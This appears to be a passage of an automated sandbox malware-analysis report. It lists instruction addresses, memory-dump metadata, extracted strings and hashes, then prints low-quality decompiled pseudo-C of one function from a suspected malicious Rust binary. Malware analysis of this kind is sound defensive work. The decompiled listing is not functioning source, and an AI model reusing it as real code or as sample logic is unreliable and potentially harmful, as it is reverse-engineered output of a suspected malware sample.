                                                                                          0x7ff768c6d64f
                                                                                          0x7ff768c6d655
                                                                                          0x7ff768c6d65c
                                                                                          0x7ff768c6d669
                                                                                          0x7ff768c6d66c
                                                                                          0x7ff768c6d66f
                                                                                          0x7ff768c6d677
                                                                                          0x7ff768c6d67b
                                                                                          0x7ff768c6d684
                                                                                          0x7ff768c6d691
                                                                                          0x7ff768c6d696
                                                                                          0x7ff768c6d6ad
                                                                                          0x7ff768c6d6b7
                                                                                          0x7ff768c6d6c5
                                                                                          0x7ff768c6d6d2
                                                                                          0x7ff768c6d6d8
                                                                                          0x7ff768c6d6e5
                                                                                          0x7ff768c6d6f1
                                                                                          0x7ff768c6d6f6
                                                                                          0x7ff768c6d6ff
                                                                                          0x7ff768c6d703
                                                                                          0x7ff768c6d70a
                                                                                          0x7ff768c6d715
                                                                                          0x7ff768c6d720
                                                                                          0x7ff768c6d72b
                                                                                          0x7ff768c6d745
                                                                                          0x7ff768c6d74c
                                                                                          0x7ff768c6d752
                                                                                          0x7ff768c6d760
                                                                                          0x7ff768c6d765
                                                                                          0x7ff768c6d770
                                                                                          0x7ff768c6d77b
                                                                                          0x7ff768c6d786
                                                                                          0x7ff768c6d791
                                                                                          0x7ff768c6d79a
                                                                                          0x7ff768c6d7a1
                                                                                          0x7ff768c6d7a6
                                                                                          0x7ff768c6d7ad
                                                                                          0x7ff768c6d7af
                                                                                          0x7ff768c6d7b8
                                                                                          0x7ff768c6d7c5
                                                                                          0x7ff768c6d7cb
                                                                                          0x7ff768c6d7d4
                                                                                          0x7ff768c6d7d6
                                                                                          0x7ff768c6d7df
                                                                                          0x7ff768c6d7eb
                                                                                          0x7ff768c6d7f7
                                                                                          0x7ff768c6d7fe
                                                                                          0x7ff768c6d805
                                                                                          0x7ff768c6d80c
                                                                                          0x7ff768c6d820
                                                                                          0x7ff768c6d824
                                                                                          0x7ff768c6d832
                                                                                          0x7ff768c6d835
                                                                                          0x7ff768c6d83a
                                                                                          0x7ff768c6d845
                                                                                          0x7ff768c6d84b
                                                                                          0x7ff768c6d850
                                                                                          0x7ff768c6d859
                                                                                          0x7ff768c6d85f
                                                                                          0x7ff768c6d865
                                                                                          0x7ff768c6d873
                                                                                          0x7ff768c6d884
                                                                                          0x7ff768c6d888
                                                                                          0x7ff768c6d892
                                                                                          0x7ff768c6d898
                                                                                          0x7ff768c6d8a0
                                                                                          0x7ff768c6d8b0
                                                                                          0x7ff768c6d8c2
                                                                                          0x7ff768c6d8cf
                                                                                          0x7ff768c6d8d8
                                                                                          0x7ff768c6d8dd
                                                                                          0x7ff768c6d8f2
                                                                                          0x7ff768c6d8f5
                                                                                          0x7ff768c6d902
                                                                                          0x7ff768c6d910
                                                                                          0x7ff768c6d916
                                                                                          0x7ff768c6d91e
                                                                                          0x7ff768c6d926
                                                                                          0x7ff768c6d92d
                                                                                          0x7ff768c6d934
                                                                                          0x7ff768c6d941
                                                                                          0x7ff768c6d953
                                                                                          0x7ff768c6d95a
                                                                                          0x7ff768c6d95f
                                                                                          0x7ff768c6d963
                                                                                          0x7ff768c6d966
                                                                                          0x7ff768c6d96c
                                                                                          0x7ff768c6d96e
                                                                                          0x7ff768c6d985
                                                                                          0x7ff768c6d992
                                                                                          0x7ff768c6d9a0
                                                                                          0x7ff768c6d9ad
                                                                                          0x7ff768c6d9b4
                                                                                          0x7ff768c6d9be
                                                                                          0x7ff768c6d9c4
                                                                                          0x7ff768c6d9cb
                                                                                          0x7ff768c6d9d6
                                                                                          0x7ff768c6d9dd
                                                                                          0x7ff768c6d9e5
                                                                                          0x7ff768c6d9ed
                                                                                          0x7ff768c6d9f3
                                                                                          0x7ff768c6da03
                                                                                          0x7ff768c6da0b
                                                                                          0x7ff768c6da16
                                                                                          0x7ff768c6da21
                                                                                          0x7ff768c6da35
                                                                                          0x7ff768c6da41
                                                                                          0x7ff768c6da48
                                                                                          0x7ff768c6da51
                                                                                          0x7ff768c6da58
                                                                                          0x7ff768c6da62
                                                                                          0x7ff768c6da66
                                                                                          0x7ff768c6da6a
                                                                                          0x7ff768c6da7b
                                                                                          0x7ff768c6da8e
                                                                                          0x7ff768c6da97
                                                                                          0x7ff768c6da9c
                                                                                          0x7ff768c6daaa
                                                                                          0x7ff768c6dab3
                                                                                          0x7ff768c6dad3
                                                                                          0x7ff768c6dae7
                                                                                          0x7ff768c6daec
                                                                                          0x7ff768c6daf1
                                                                                          0x7ff768c6daf8
                                                                                          0x7ff768c6daff
                                                                                          0x7ff768c6db08
                                                                                          0x7ff768c6db15
                                                                                          0x7ff768c6db18
                                                                                          0x7ff768c6db24
                                                                                          0x7ff768c6db26
                                                                                          0x7ff768c6db35
                                                                                          0x7ff768c6db4b
                                                                                          0x7ff768c6db51
                                                                                          0x7ff768c6db56
                                                                                          0x7ff768c6db5d
                                                                                          0x7ff768c6db60
                                                                                          0x7ff768c6db72
                                                                                          0x7ff768c6db78
                                                                                          0x7ff768c6db7d
                                                                                          0x7ff768c6db84
                                                                                          0x7ff768c6db8e
                                                                                          0x7ff768c6db94
                                                                                          0x7ff768c6dba2
                                                                                          0x7ff768c6dbb0
                                                                                          0x7ff768c6dbb7
                                                                                          0x7ff768c6dbbe
                                                                                          0x7ff768c6dbc5
                                                                                          0x7ff768c6dbcf
                                                                                          0x7ff768c6dbd1
                                                                                          0x7ff768c6dbe2
                                                                                          0x7ff768c6dbee
                                                                                          0x7ff768c6dbf5
                                                                                          0x7ff768c6dbfe
                                                                                          0x7ff768c6dc13
                                                                                          0x7ff768c6dc19
                                                                                          0x7ff768c6dc1d
                                                                                          0x7ff768c6dc34
                                                                                          0x7ff768c6dc3a
                                                                                          0x7ff768c6dc40
                                                                                          0x7ff768c6dc54
                                                                                          0x7ff768c6dc5b
                                                                                          0x7ff768c6dc62
                                                                                          0x7ff768c6dc69
                                                                                          0x7ff768c6dc70
                                                                                          0x7ff768c6dc7b
                                                                                          0x7ff768c6dc86
                                                                                          0x7ff768c6dc94
                                                                                          0x7ff768c6dc9a
                                                                                          0x7ff768c6dca0
                                                                                          0x7ff768c6dca3
                                                                                          0x7ff768c6dca8
                                                                                          0x7ff768c6dcbd
                                                                                          0x7ff768c6dccb
                                                                                          0x7ff768c6dcce
                                                                                          0x7ff768c6dcd9
                                                                                          0x7ff768c6dce4
                                                                                          0x7ff768c6dcf4
                                                                                          0x7ff768c6dcf6
                                                                                          0x7ff768c6dd00
                                                                                          0x7ff768c6dd02
                                                                                          0x7ff768c6dd10
                                                                                          0x7ff768c6dd18
                                                                                          0x7ff768c6dd1c
                                                                                          0x7ff768c6dd20
                                                                                          0x7ff768c6dd24
                                                                                          0x7ff768c6dd2a
                                                                                          0x7ff768c6dd2c
                                                                                          0x7ff768c6dd3b
                                                                                          0x7ff768c6dd3f
                                                                                          0x7ff768c6dd47
                                                                                          0x7ff768c6dd4c
                                                                                          0x7ff768c6dd53
                                                                                          0x7ff768c6dd6d

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$EnvironmentStringsmemcpy
                                                                                          • String ID: .exeprogram not found$PATHlock count overflow in reentrant mutexlibrary\std\src\sys_common\remutex.rs$\?\\$]?\\$assertion failed: self.height > 0$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
                                                                                          • API String ID: 41608178-594559629
                                                                                          • Opcode ID: cbf81377581b5abcbee780f29281a1f86901297b184214abc6ab0621f1eee135
                                                                                          • Instruction ID: 87c90d0c5da642f9c07341cddfc7af2d5904e396d35f7089f17fb50b062b65ee
                                                                                          • Opcode Fuzzy Hash: cbf81377581b5abcbee780f29281a1f86901297b184214abc6ab0621f1eee135
                                                                                          • Instruction Fuzzy Hash: 40337F62A08BC1C9E770AF259C443F9A3A0FF48788F944176DB4D5BB89DF789285C318
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B833D6 Relevance: 120.1, APIs: 72, Strings: 5, Instructions: 4622memoryCOMMONCrypto
                                                                                          Download Yara Rule
                                                                                          C-Code - Quality: 26%
                                                                                          			E00007FF77FF768B833D6(void* __ebp, void* __esp, long long __rbx, long long __rdi, void* __rsi, void* __r9, signed int __r11, void* __r12) {
				int _t1123;
				void* _t1132;
				signed int _t1138;
				signed int _t1149;
				void* _t1156;
				void* _t1164;
				void* _t1166;
				int _t1169;
				int _t1177;
				void* _t1179;
				int _t1182;
				void* _t1184;
				int _t1187;
				void* _t1189;
				void* _t1193;
				void* _t1197;
				int _t1200;
				void* _t1202;
				int _t1205;
				void* _t1207;
				int _t1210;
				void* _t1212;
				int _t1218;
				void* _t1220;
				int _t1223;
				int _t1227;
				int _t1231;
				void* _t1239;
				int _t1242;
				int _t1248;
				void* _t1252;
				int _t1263;
				void* _t1265;
				int _t1268;
				void* _t1270;
				int _t1273;
				void* _t1278;
				int _t1284;
				void* _t1286;
				void* _t1290;
				int _t1293;
				void* _t1448;
				void* _t1450;
				void* _t1481;
				long long _t1525;
				signed long long _t1532;
				long long _t1537;
				long long _t1632;
				intOrPtr* _t1634;
				signed long long _t1635;
				long long _t1637;
				long long* _t1641;
				signed long long _t1645;
				long long _t1646;
				signed long long _t1651;
				long long _t1652;
				long long _t1653;
				long long _t1666;
				signed long long _t1761;
				signed long long _t1775;
				long long _t1788;
				long long _t1792;
				signed long long _t1793;
				long long _t1797;
				intOrPtr _t1798;
				signed long long _t1800;
				signed long long _t1808;
				signed long long _t1816;
				signed long long _t1824;
				signed long long _t1832;
				intOrPtr* _t1843;
				signed int _t1853;
				long long _t1869;
				signed int _t1886;
				intOrPtr* _t2118;
				signed long long* _t2119;
				long long _t2123;
				signed long long _t2124;
				long long _t2127;
				long long _t2143;
				signed long long* _t2158;
				signed long long _t2165;
				signed long long* _t2169;
				signed long long* _t2173;
				signed long long* _t2177;
				signed long long* _t2181;
				signed long long* _t2185;
				signed long long* _t2189;
				signed long long* _t2193;
				signed long long* _t2197;
				signed long long* _t2201;
				signed int* _t2205;
				signed long long* _t2209;
				signed long long* _t2213;
				signed long long* _t2217;
				signed long long _t2221;
				signed long long _t2225;
				signed long long _t2229;
				signed long long* _t2233;
				signed long long* _t2237;
				signed long long* _t2241;
				signed long long* _t2245;
				signed long long* _t2249;
				signed long long* _t2253;
				signed long long* _t2257;
				signed long long* _t2261;
				signed long long* _t2265;
				signed long long* _t2269;
				intOrPtr* _t2271;
				intOrPtr* _t2273;
				long long _t2279;
				long long _t2281;
				long long _t2282;
				long long _t2287;
				signed int _t2292;
				signed long long _t2294;
				void* _t2311;
				intOrPtr* _t2313;
				signed int _t2316;
				signed int _t2326;
				intOrPtr _t2337;
				long long _t2431;
				signed int _t2434;
				signed long long* _t2438;
				long long _t2443;
				unsigned long long _t2445;
				signed long long _t2447;
				signed long long _t2476;
				signed long long _t2479;
				signed long long _t2482;
				void* _t2504;
				long long* _t2506;
				signed long long _t2534;
				signed long long _t2562;
				signed long long _t2564;
				signed long long _t2566;
				long long* _t2588;
				long long* _t2589;
				long long* _t2590;
				long long* _t2591;
				long long* _t2592;
				long long* _t2593;
				long long* _t2594;
				long long* _t2595;
				long long* _t2596;
				long long* _t2597;
				long long* _t2598;
				long long* _t2599;
				long long* _t2600;
				long long* _t2601;
				long long* _t2602;
				long long* _t2603;
				long long* _t2604;
				long long* _t2605;
				long long* _t2606;
				long long* _t2607;
				long long* _t2608;
				long long* _t2609;
				long long* _t2610;
				long long* _t2611;
				long long* _t2612;
				long long* _t2613;
				long long* _t2614;
				signed long long _t2620;
				signed long long _t2621;
				signed long long _t2622;
				void* _t2625;
				signed long long* _t2631;
				unsigned long long _t2634;
				intOrPtr _t2635;
				void* _t2636;
				void* _t2638;
				unsigned long long _t2641;
				signed long long* _t2644;
				long long _t2648;
				signed long long _t2652;
				signed long long _t2653;
				signed long long _t2654;
				signed long long* _t2657;
				signed long long* _t2660;

				_t1123 = HeapFree();
				if (__rbx == 0) goto 0x68b8346c;
				 *(_t2504 + 0x30) = __rdi;
				0x68b7875f();
				goto 0x68b835dc;
				_t2118 = _t2504 + 0x30;
				 *_t2118 = 0x68dba661;
				 *_t2118 = 0xeb1d5e47;
				_t2119 =  *_t2118;
				E00007FF77FF768B7D50A(_t1123, 0,  *_t2118, _t2119);
				E00007FF77FF768BEFD87(0xeb1d5e47,  *_t2118);
				 *(_t2504 + 0x160) = 0xeb1d5e47;
				 *(_t2504 + 0x168) = _t2119;
				 *_t2119 = 0x07e5c47e ^  *0xeb1d5e47;
				_t2119[1] = 0xb8fb4bb1 ^  *0x298DA07DEB1D5E4F;
				 *((long long*)(_t2504 + 0x170)) = 0xc;
				goto 0x68b83142;
				E00007FF77FF768BEFD87(0xeb1d5e47,  *_t2118);
				 *((long long*)(_t2504 + 0x210)) = __rdi;
				 *(_t2504 + 0x218) = _t2119;
				 *((long long*)(_t2504 + 0x220)) = 0x2000;
				asm("pxor xmm0, xmm0");
				asm("movdqu [esp+0x228], xmm0");
				 *((long long*)(_t2504 + 0x238)) = 0;
				_t2311 = __r12 + 0x30;
				if ( *((long long*)(__r12 + 0x40)) == 0) goto 0x68b834f5;
				_t2506 = _t2504 + 0xf0;
				 *_t2506 = __rbx;
				 *((long long*)(_t2506 + 8)) = 1;
				 *((long long*)(_t2506 + 0x10)) = __rbx;
				_t2271 = _t2504 + 0x30;
				E00007FF77FF768B808F1(_t2271, _t2504 + 0x210, _t2506);
				if ( *_t2271 == __rbx) goto 0x68b83546;
				goto 0x68b83577;
				_t2273 = _t2504 + 0xf0;
				E00007FF77FF768B808F1(_t2273, _t2504 + 0x210, _t2311);
				_t2431 = _t2504 + 0x30;
				E00007FF77FF768BBBF10(_t2431,  *((intOrPtr*)(__r12 + 0x38)),  *((intOrPtr*)(__r12 + 0x40)), __r9);
				_t1632 =  *_t2273;
				if ( *_t2431 == 0) goto 0x68b8359b;
				if (_t1632 == 0) goto 0x68b835b2;
				goto 0x68b835b9;
				_t1788 = _t2504 + 0x30;
				_t2123 =  *(_t2504 + 0xf8);
				E00007FF77FF768BBBF10(_t1788, _t2123,  *((intOrPtr*)(_t2504 + 0x100)), __r9);
				if ( *_t1788 == 0) goto 0x68b89dbe;
				if ( *(_t2504 + 0xf0) == 0) goto 0x68b835c2;
				HeapFree(??, ??, ??);
				goto 0x68b835c2;
				 *((long long*)(__r12 + 0x40)) = _t1788;
				if (_t1632 != 0) goto 0x68b835c2;
				goto 0x68b89df7;
				 *((long long*)(__r12 + 0x40)) = 0;
				 *(_t2504 + 0x30) = 0x68e2bf50;
				0x68b7875f();
				E00007FF77FF768B79A56();
				sil = 0x17;
				_t1843 = _t2504 + 0x30;
				 *_t1843 = sil;
				_t1448 =  *(_t2504 + 0x360);
				_t1481 =  *(_t2504 + 0x363);
				 *(_t1843 + 1) = _t1448;
				 *(_t1843 + 4) = _t1481;
				 *((long long*)(_t1843 + 8)) = _t2431;
				 *((long long*)(_t1843 + 0x10)) = _t1788;
				 *((long long*)(_t1843 + 0x18)) = _t1632;
				 *((long long*)(_t1843 + 0x20)) = _t2123;
				asm("movdqa xmm0, [esp+0x3a0]");
				asm("movdqu [ecx+0x28], xmm0");
				 *((long long*)(_t1843 + 0x38)) =  *((intOrPtr*)(_t2504 + 0x3b0));
				_t1132 = E00007FF77FF768B7933E(_t1843);
				_t2313 = _t2504 + 0x30;
				E00007FF77FF768BFB107(_t1132, _t2313);
				_t1634 =  *((intOrPtr*)(_t2313 + 8));
				_t2124 =  *((intOrPtr*)(_t2313 + 0x10));
				 *((long long*)(_t2504 + 0x3a0)) =  *_t2313;
				 *((long long*)(_t2504 + 0x3a8)) = _t1634;
				 *((long long*)(_t2504 + 0x3b0)) = _t1634 + (_t2124 + _t2124 * 2) * 8;
				 *((long long*)(_t2504 + 0x3b8)) = _t1634;
				if (_t2124 == 0) goto 0x68b84227;
				_t2636 = _t2504 + 0x40;
				 *((long long*)(_t2504 + 0x358)) = __r12 + 0x48;
				 *((long long*)(_t2504 + 0x420)) = __r12 + 0x60;
				 *((long long*)(_t2504 + 0x378)) = __r12 + 0x78;
				 *((long long*)(_t2504 + 0x3a8)) = _t1634 + 0x18;
				_t2279 =  *((intOrPtr*)(_t1634 + 8));
				if (_t2279 == 0) goto 0x68b84227;
				 *((long long*)(_t2504 + 0x2c8)) =  *((intOrPtr*)(_t1634 + 0x10));
				0x68bb17c0();
				0x68b8169f(); // executed
				if ( *(_t2504 + 0x30) != 0x1a) goto 0x68b89c75;
				 *((long long*)(_t2504 + 0x2b0)) =  *_t1634;
				 *((long long*)(_t2504 + 0x2b8)) = _t2279;
				_t2127 =  *(_t2504 + 0x38);
				_t2434 =  *((intOrPtr*)(_t2504 + 0x40));
				_t1635 =  *((intOrPtr*)(_t2504 + 0x48));
				_t1853 = _t2434 + (_t1635 + _t1635 * 8) * 8;
				 *((long long*)(_t2504 + 0x2a0)) = _t2127;
				 *((long long*)(_t2504 + 0x2d0)) = _t2127;
				 *(_t2504 + 0x2d8) = _t2434;
				 *(_t2504 + 0x380) = _t1853;
				 *(_t2504 + 0x2e0) = _t1853;
				 *(_t2504 + 0x2e8) = _t2434;
				if (_t1635 == 0) goto 0x68b839e5;
				_t89 = _t2434 + 0x48; // 0x48
				_t2625 = _t89;
				_t2316 = _t2434;
				 *(_t2504 + 0x198) = _t2434;
				_t1637 =  *((intOrPtr*)(_t2625 - 0x40));
				if (_t1637 == 0) goto 0x68b839cd;
				 *((long long*)(_t2636 + 0x40)) =  *((intOrPtr*)(_t2625 - 8));
				asm("repe inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("repe inc ecx");
				 *(_t2504 + 0x30) = _t2434;
				 *(_t2504 + 0x38) = _t2316;
				 *((long long*)(_t2504 + 0x40)) =  *((intOrPtr*)(_t2625 - 0x48));
				 *((long long*)(_t2504 + 0x48)) = _t1637;
				if ( *((long long*)(_t2504 + 0x80)) == 0) goto 0x68b838f7;
				if ( *((long long*)(_t2504 + 0x50)) == 0) goto 0x68b838f7;
				 *(_t2504 + 0xe8) = _t2316;
				memcpy(_t1448, _t1481, 9);
				_t1450 = _t1481 + 0x12;
				_t2641 = _t2504 + 0xf0;
				0x68bb17c0();
				0x68bb17c0();
				_t2281 =  *((intOrPtr*)(_t2504 + 0x1e0));
				E00007FF77FF768BEFD87(_t1637, _t2281);
				 *((long long*)(_t2504 + 0x120)) = _t1637;
				 *((long long*)(_t2504 + 0x128)) =  *((intOrPtr*)(_t2504 + 0x1c0));
				memcpy(??, ??, ??);
				 *((long long*)(_t2504 + 0x130)) = _t2281;
				r8d = 0;
				E00007FF77FF768B8E281();
				_t1525 =  *((long long*)(_t2504 + 0x210));
				if (_t1525 == 0) goto 0x68b83912;
				asm("movdqu xmm0, [eax]");
				asm("movups xmm1, [eax+0x10]");
				asm("movups xmm2, [eax+0x20]");
				asm("movups xmm3, [eax+0x30]");
				asm("movaps [esp+0x120], xmm3");
				asm("movaps [esp+0x110], xmm2");
				asm("movaps [esp+0x100], xmm1");
				asm("movdqa [esp+0xf0], xmm0");
				_t1138 = E00007FF77FF768B7933E(_t2641);
				0x68b79458();
				goto 0x68b838ff;
				0x68b79458();
				if (_t1525 != 0) goto 0x68b83779;
				goto 0x68b839c5;
				_t2282 =  *((intOrPtr*)(_t2504 + 0x220));
				asm("movdqu xmm0, [eax+0x10]");
				asm("movups xmm1, [eax+0x20]");
				asm("movups xmm2, [eax+0x30]");
				asm("movdqa [esp+0xf0], xmm0");
				asm("movaps [esp+0x100], xmm1");
				asm("movaps [esp+0x110], xmm2");
				 *((long long*)(_t2504 + 0x120)) =  *((intOrPtr*)(_t2504 + 0x258));
				0x68b79458();
				if (_t2282 == 0) goto 0x68b838e5;
				_t1641 =  *(_t2504 + 0xe8);
				 *_t1641 =  *(_t2504 + 0x218);
				 *((long long*)(_t1641 + 8)) = _t2282;
				asm("movdqa xmm0, [esp+0xf0]");
				asm("movaps xmm1, [esp+0x100]");
				asm("movaps xmm2, [esp+0x110]");
				asm("movdqu [eax+0x10], xmm0");
				asm("movups [eax+0x20], xmm1");
				asm("movups [eax+0x30], xmm2");
				 *((long long*)(_t1641 + 0x40)) =  *((intOrPtr*)(_t2504 + 0x120));
				goto 0x68b838ff;
				 *(_t2504 + 0x2d8) =  *(_t2504 + 0x380);
				_t1792 = _t2504 + 0x210;
				E00007FF77FF768B7A11A(_t1138 * 0x8e38e38f, _t2504 + 0x2d0);
				 *(_t2504 + 0x360) =  *((intOrPtr*)(_t2504 + 0x2a0));
				 *((long long*)(_t2504 + 0x368)) =  *(_t2504 + 0x198);
				 *(_t2504 + 0x370) = _t2641 >> 6;
				0x68b776ca();
				0x68bb17c0();
				E00007FF77FF768B827BD(_t1450, _t1481, __esp + 0xc, _t2504 + 0x30,  *((intOrPtr*)(_t2504 + 0x298)), _t1792); // executed
				if ( *(_t2504 + 0x30) != 0x1a) goto 0x68b89cbf;
				_t2326 =  *(_t2504 + 0x38);
				_t2657 =  *((intOrPtr*)(_t2504 + 0x40));
				_t1645 =  *((intOrPtr*)(_t2504 + 0x48));
				_t1869 = _t2657 + _t1645 * 0x70;
				 *(_t2504 + 0x160) = _t2326;
				 *(_t2504 + 0x168) = _t2657;
				 *((long long*)(_t2504 + 0x170)) = _t1869;
				 *(_t2504 + 0x178) = _t2657;
				if (_t1645 == 0) goto 0x68b83d1e;
				 *((long long*)(_t2504 + 0x2a0)) = _t1869;
				 *(_t2504 + 0x198) = _t2326;
				_t157 =  &(_t2657[0xe]); // 0x70
				_t2644 = _t157;
				_t2438 = _t2657;
				 *(_t2504 + 0xe8) = _t2657;
				_t1646 =  *((intOrPtr*)(_t2644 - 0x58));
				if (_t1646 == 0) goto 0x68b83d06;
				_t160 = _t2644 - 0x70; // 0x0
				 *((long long*)(_t2636 + 0x10)) =  *((intOrPtr*)(_t160 + 0x10));
				asm("movdqu xmm0, [ecx]");
				asm("repe inc ecx");
				memcpy(_t1450, _t1481, 0xa);
				 *(_t2504 + 0x30) = _t2657;
				 *(_t2504 + 0x38) = _t2438;
				 *((long long*)(_t2504 + 0x58)) = _t1646;
				if ( *((long long*)(_t2504 + 0x90)) == 0) goto 0x68b83c90;
				if ( *((long long*)(_t2504 + 0x60)) == 0) goto 0x68b83c90;
				memcpy(_t1481 + 0x14, _t1481, 0xe);
				0x68bb17c0();
				0x68bb17c0();
				_t2287 =  *((intOrPtr*)(_t2504 + 0x1f0));
				E00007FF77FF768BEFD87(_t1646, _t2287);
				 *((long long*)(_t2504 + 0x250)) = _t1646;
				 *((long long*)(_t2504 + 0x258)) =  *((intOrPtr*)(_t2504 + 0x1d0));
				memcpy(??, ??, ??);
				 *((long long*)(_t2504 + 0x260)) = _t2287;
				0x68bb17c0();
				asm("movups xmm0, [esp+0x1a0]");
				asm("movups [esp+0x210], xmm0");
				r8d = 0;
				0x68b8e6f0();
				_t1793 =  *((intOrPtr*)(_t2504 + 0x108));
				_t1532 = _t1793;
				if (_t1532 == 0) goto 0x68b83c9a;
				 *(_t2504 + 0x350) =  *((intOrPtr*)(_t2504 + 0x100));
				asm("movups xmm0, [esp+0xf0]");
				asm("movaps [esp+0x340], xmm0");
				memcpy(_t1481 + 0x1c, _t1481, 0xa);
				E00007FF77FF768B79364();
				_t2438[2] =  *(_t2504 + 0x350);
				asm("movdqa xmm0, [esp+0x340]");
				asm("movdqu [ebp], xmm0");
				_t2438[3] = _t1793;
				memcpy(_t1481 + 0x14, _t1481, 0xa);
				goto 0x68b83ce8;
				E00007FF77FF768B79364();
				goto 0x68b83cf0;
				asm("movdqu xmm0, [eax]");
				asm("movups xmm1, [eax+0x10]");
				asm("movups xmm2, [eax+0x20]");
				asm("movups xmm3, [eax+0x30]");
				asm("movaps [esp+0x240], xmm3");
				asm("movaps [esp+0x230], xmm2");
				asm("movaps [esp+0x220], xmm1");
				asm("movdqa [esp+0x210], xmm0");
				_t1149 = E00007FF77FF768B7933E(_t1792);
				E00007FF77FF768B79364();
				_t2638 = _t2504 + 0x40;
				if (_t1532 != 0) goto 0x68b83ad0;
				 *(_t2504 + 0x168) =  *((intOrPtr*)(_t2504 + 0x2a0));
				E00007FF77FF768B7A069(_t1149 * 0x92492493, _t2504 + 0x160);
				 *((long long*)(_t2504 + 0x388)) =  *(_t2504 + 0x198);
				 *((long long*)(_t2504 + 0x390)) =  *(_t2504 + 0xe8);
				 *((long long*)(_t2504 + 0x398)) = _t1792;
				0x68b775f1();
				0x68bb17c0();
				E00007FF77FF768B81F59(_t1481 + 0x14, _t1481, __esp + 0x3c, _t2504 + 0x30,  *((intOrPtr*)(_t2504 + 0x298)), _t1792); // executed
				if ( *(_t2504 + 0x30) != 0x1a) goto 0x68b89cfe;
				_t2648 =  *(_t2504 + 0x38);
				_t2660 =  *((intOrPtr*)(_t2504 + 0x40));
				_t1651 =  *((intOrPtr*)(_t2504 + 0x48));
				_t1886 = _t2660 + (_t1651 << 6);
				 *((long long*)(_t2504 + 0x2d0)) = _t2648;
				 *(_t2504 + 0x2d8) = _t2660;
				 *(_t2504 + 0x2e0) = _t1886;
				 *(_t2504 + 0x2e8) = _t2660;
				if (_t1651 == 0) goto 0x68b84027;
				 *(_t2504 + 0xe8) = _t1886;
				_t225 =  &(_t2660[8]); // 0x40
				_t2631 = _t225;
				_t2292 = _t2660;
				_t1652 =  *((intOrPtr*)(_t2631 - 0x28));
				if (_t1652 == 0) goto 0x68b8401f;
				_t227 = _t2631 - 0x40; // 0x0
				_t2143 =  *((intOrPtr*)(_t227 + 0x10));
				 *((long long*)(_t2638 + 0x10)) = _t2143;
				asm("movups xmm0, [ecx]");
				asm("inc ecx");
				asm("repe inc ecx");
				asm("inc ecx");
				asm("movups [ecx+0x10], xmm1");
				asm("movdqu [ecx], xmm0");
				 *(_t2504 + 0x30) = _t2660;
				 *(_t2504 + 0x38) = _t2292;
				 *((long long*)(_t2504 + 0x58)) = _t1652;
				if ( *((long long*)(_t2504 + 0x60)) == 0) goto 0x68b83f64;
				asm("inc ecx");
				_t1653 =  *((intOrPtr*)(_t2638 + 0x10));
				asm("inc ecx");
				asm("inc ecx");
				asm("movaps [esp+0x1d0], xmm2");
				asm("movaps [esp+0x1c0], xmm1");
				 *((long long*)(_t2504 + 0x1b0)) = _t1653;
				 *((long long*)(_t2504 + 0x1b8)) =  *((intOrPtr*)(_t2638 + 0x18));
				asm("movaps [esp+0x1a0], xmm0");
				_t2443 =  *((intOrPtr*)(_t2504 + 0x1c0));
				E00007FF77FF768BEFD87(_t1653, _t2443);
				 *((long long*)(_t2504 + 0x100)) = _t1653;
				 *((long long*)(_t2504 + 0x108)) = _t2143;
				memcpy(??, ??, ??);
				 *((long long*)(_t2504 + 0x110)) = _t2443;
				0x68bb17c0();
				asm("movaps xmm0, [esp+0x1a0]");
				asm("movups [esp+0xf0], xmm0");
				r8d = 0;
				E00007FF77FF768B8E4F2();
				_t1537 =  *((long long*)(_t2504 + 0x210));
				if (_t1537 == 0) goto 0x68b83f7f;
				asm("movdqu xmm0, [eax]");
				asm("movups xmm1, [eax+0x10]");
				asm("movups xmm2, [eax+0x20]");
				asm("movups xmm3, [eax+0x30]");
				asm("movaps [esp+0x120], xmm3");
				asm("movaps [esp+0x110], xmm2");
				asm("movaps [esp+0x100], xmm1");
				asm("movdqa [esp+0xf0], xmm0");
				_t1156 = E00007FF77FF768B7933E(_t2504 + 0xf0);
				goto 0x68b83f67;
				E00007FF77FF768B792F5();
				if (_t1537 != 0) goto 0x68b83df1;
				goto 0x68b84017;
				 *((long long*)(_t2504 + 0x170)) =  *((intOrPtr*)(_t2504 + 0x228));
				asm("movups xmm0, [ecx]");
				asm("movaps [esp+0x160], xmm0");
				_t1797 =  *((intOrPtr*)(_t2504 + 0x230));
				asm("movdqu xmm0, [eax]");
				asm("movups xmm1, [eax+0x10]");
				asm("movdqa [esp+0xf0], xmm0");
				asm("movaps [esp+0x100], xmm1");
				E00007FF77FF768B792F5();
				if (_t1797 == 0) goto 0x68b83f6c;
				 *((long long*)(_t2292 + 0x10)) =  *((intOrPtr*)(_t2504 + 0x170));
				asm("movaps xmm0, [esp+0x160]");
				asm("movups [edi], xmm0");
				 *((long long*)(_t2292 + 0x18)) = _t1797;
				asm("movdqa xmm0, [esp+0xf0]");
				asm("movaps xmm1, [esp+0x100]");
				asm("movdqu [edi+0x20], xmm0");
				asm("movups [edi+0x30], xmm1");
				goto 0x68b83f6c;
				 *(_t2504 + 0x2d8) =  *(_t2504 + 0xe8);
				_t2294 = _t2292 + 0x40 - _t2660;
				_t2445 = _t2294 >> 6;
				E00007FF77FF768B7A0CB(_t1156, _t1797, _t2504 + 0x2d0, _t2504 + 0xf0);
				 *((long long*)(_t2504 + 0x340)) = _t2648;
				 *(_t2504 + 0x348) = _t2660;
				 *(_t2504 + 0x350) = _t2445;
				0x68b77596();
				_t2634 =  *(_t2504 + 0x370);
